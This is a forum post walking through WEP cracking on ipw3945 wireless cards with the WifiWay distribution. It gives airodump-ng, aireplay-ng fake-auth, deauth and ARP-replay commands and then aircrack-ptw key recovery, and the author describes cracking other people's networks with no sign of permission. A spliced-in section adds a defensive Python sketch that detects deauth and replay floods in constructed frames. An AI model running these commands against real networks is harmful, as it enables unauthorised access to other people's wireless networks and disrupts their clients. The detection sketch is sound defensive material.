Happy to say that I have been able to perform injection on ipw3945 cards using WifiWay. I tried BackTrack to no avail. It would seem that since they have a special "Load IPW3945" option they would have solved this problem. Turns out it's a big fat "No" (I love the software though). So after a lot of digging around, it was apparent that the ipw3945 driver on BackTrack wasn't patched for injection (refer to the Aircrack website for notes on how almost every driver needs to be patched for injection -- they have no patch for ipw3945 as of now). BackTrack has lots of other drivers that are patched for injection (check this website for listings of card compatibility and patched drivers -- http://backtrack.offensive-security.com/index.php?title=HCL:Wireless). Now the only thing on the internet (yes, and I can say this with confidence cause I have SCOURED the internet) that claims to have a ready-to-rumble patched ipw3945 driver is WifiWay. Good news first... it works! Bad news... good support is difficult to find since everything is written in poor English (nothing personal guys :-), I love the distro).

So I am writing this for all the rest of us ignorant non-Spanish-speaking Americans (aside -- if you need more tech info and come across a site in Spanish, try Google's page translator; it converts it from Spanish to somewhat readable English). The first thing you will notice is that WifiWay is not as fancy as BackTrack in that it doesn't have all the bells and whistles, but it gets the job done for ipw3945 cards. Also WifiWay is slightly different in the way it gets the job done. It uses two different devices (virtual or otherwise), rtap0 for monitoring and wifi0 for injection.
Also for those of you rebels (and I did this too) who don't like to follow directions: if you do an iwconfig or ifconfig on a system that has been cold-booted, it might seem like the card is not being recognized, as iwconfig shows up with rtap0 and wifi0 and others with no wireless extensions, and ifconfig is equally stoic. Also the wlanconfig stuff doesn't work and only comes up with "operation not supported" messages. But it's OK, forget all that stuff for now. So follow these directions closely, if not exactly, and you will soon find yourself in Wifiland. I am assuming you have used a bootable copy of WifiWay.
First do this:
1. airodump-ng rtap0
This step will help you find all the relevant info by exposing the networks around you. Kismet didn't work for me and I never really found Kismet to be of much use to me (I hear a lot of WHAT!'s... come on guys, we are using airodump and the networks that matter are the only ones that it can see; it doesn't matter if Kismet reports a thousand other networks. All the info you need for cracking can be obtained from airodump). If you already know the info of your targets (those of you who have unsuccessfully used BackTrack will have this) you can skip the first step.
2. ifconfig wifi0 down -- brings the wifi0 device down for resetting
3. Click the Filesystem icon on desktop and get into /sys/class/net/wifi0/device and click on the rate file. Change it from 108 to 2. Remember to save changes (Ctrl+s)
4. Click on the channel file. Change it to whatever channel you want to be on (AP channel-- say from 1 to 11). Save changes.
5. Click on the bssid file. Change it to the BSSID of the AP. Save changes.
6. ifconfig wifi0 up --brings wifi0 up again
7. airodump-ng -w file rtap0 -- you can use other filters such as --bssid, --ivs etc.
This starts collecting data in a file-0x.cap file, where "x" is a number automatically assigned by airodump.
8. aireplay-ng -1 0 -e ESSID -a BSSID -h STATION wifi0
If this doesn't work (check this site for how success looks: http://aircrack-ng.org/doku.php?id=f...ee175e572097e3 ), you can do this:
aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a BSSID -h STATION wifi0
If you see an associated client and would like to use a deauth attack instead you need to do
aireplay-ng -0 5 -a BSSID -c STATION
instead. Check the Aireplay site for details; it has all the kinds of attacks available. Ah... before I forget, if you want to confirm the injection capability of your ipw3945 card (technically you don't need to, I am telling you it works :-) ) or make sure the target is not quirky in any sense, you cannot use the -9 or --test attack in the aircrack version used by WifiWay, maybe because it's an older version of aircrack. Please let me know if you could get it to do the --test attack.
9. aireplay-ng -3 -b BSSID -h STATION wifi0
You should see the data packets (IVs) number rise in airodump. After collecting sufficient data packets (IVs), do
and you should see all the file-0x.cap files
11. aircrack-ptw file-01.cap --- Aircrack will expose the WEP Key.
--> ESSID is the name of the network ("John", "Cindy's Network", etc.), BSSID is the MAC of the AP, STATION is the MAC of your wireless card.
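For the other side of the fence, here is an added example (not part of this post or of WifiWay/aircrack) showing how a wireless IDS can spot the two traffic patterns steps 8 and 9 generate: a burst of deauthentication frames against one BSSID and a flood of replayed data frames from one station. The frame tuples, MAC addresses, window size and thresholds are all constructed/assumed for the illustration.

```python
from collections import defaultdict, deque

# Assumed frame format: (time_s, kind, src_mac, dst_mac, bssid), where kind is
# "deauth" for 802.11 deauthentication frames and "data" for data frames.
WINDOW_S = 1.0          # sliding window length (assumed)
DEAUTH_THRESHOLD = 5    # deauth frames per window before alerting (assumed)
DATA_THRESHOLD = 50     # data frames from one station per window (assumed)


def build_sample_capture():
    """Constructed sample: normal traffic, a deauth burst, then an ARP replay flood."""
    ap, client, replayer = "AA:BB:CC:00:00:01", "11:22:33:00:00:02", "DE:AD:BE:EF:00:03"
    frames = []
    # Normal: the client sends a data frame every 0.2 s for 2 s.
    for i in range(10):
        frames.append((i * 0.2, "data", client, ap, ap))
    # Deauth burst: 20 frames spoofed from the AP to the client within 0.4 s.
    for i in range(20):
        frames.append((2.0 + i * 0.02, "deauth", ap, client, ap))
    # ARP replay: 120 data frames from one station to the AP within 0.6 s.
    for i in range(120):
        frames.append((3.0 + i * 0.005, "data", replayer, ap, ap))
    frames.sort()  # order by timestamp, as a capture would be
    return frames


def detect_floods(frames, window=WINDOW_S,
                  deauth_threshold=DEAUTH_THRESHOLD, data_threshold=DATA_THRESHOLD):
    """Count frames per (kind, bssid, src) in a sliding window; alert once per key.

    Returns a list of (time_s, kind, bssid, src_mac) alerts.
    """
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for t, kind, src, _dst, bssid in frames:
        key = (kind, bssid, src)
        q = recent[key]
        q.append(t)
        while q and t - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        threshold = deauth_threshold if kind == "deauth" else data_threshold
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((t, kind, bssid, src))
    return alerts


if __name__ == "__main__":
    for alert in detect_floods(build_sample_capture()):
        print("ALERT t=%.3f %s flood on BSSID %s from %s" % alert)
```

On the constructed capture the client's normal traffic never trips the threshold, while the deauth burst and the replay flood each raise exactly one alert.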
That's it. What I realized is that using WifiWay and ipw3945 is the easiest way to do this. My Dell with an Atheros card using the madwifi-ng driver gave me much more trouble (btw you need to do wlanconfig to use madwifi-ng cause it creates virtual APs that use the same card; you can find stuff about it on the internet).
One problem I have faced (and this has nothing to do with WifiWay) is that for some networks, after step 9, the read ARP count keeps rising but the sent and got ARP packet numbers don't. They're stuck at zero? I think this has to do with the network signal strength, since all the networks I have been able to crack had high signal strength. I don't think it's a MAC filter on the AP cause all these networks have open authentication and I can associate with them just fine (step 8). Would appreciate any suggestions.
Sorry about the noobishness. I know it would be awesome to actually compile this stuff in Linux and not use WifiWay (this is important not only to achieve independence but also power, since right now I am dependent on the version of Aircrack that WifiWay incorporates in its software and of course can't mod it), but I am too busy and too new to Linux to do this. I would absolutely appreciate any suggestions and directions.
p.s. Respect your Freedom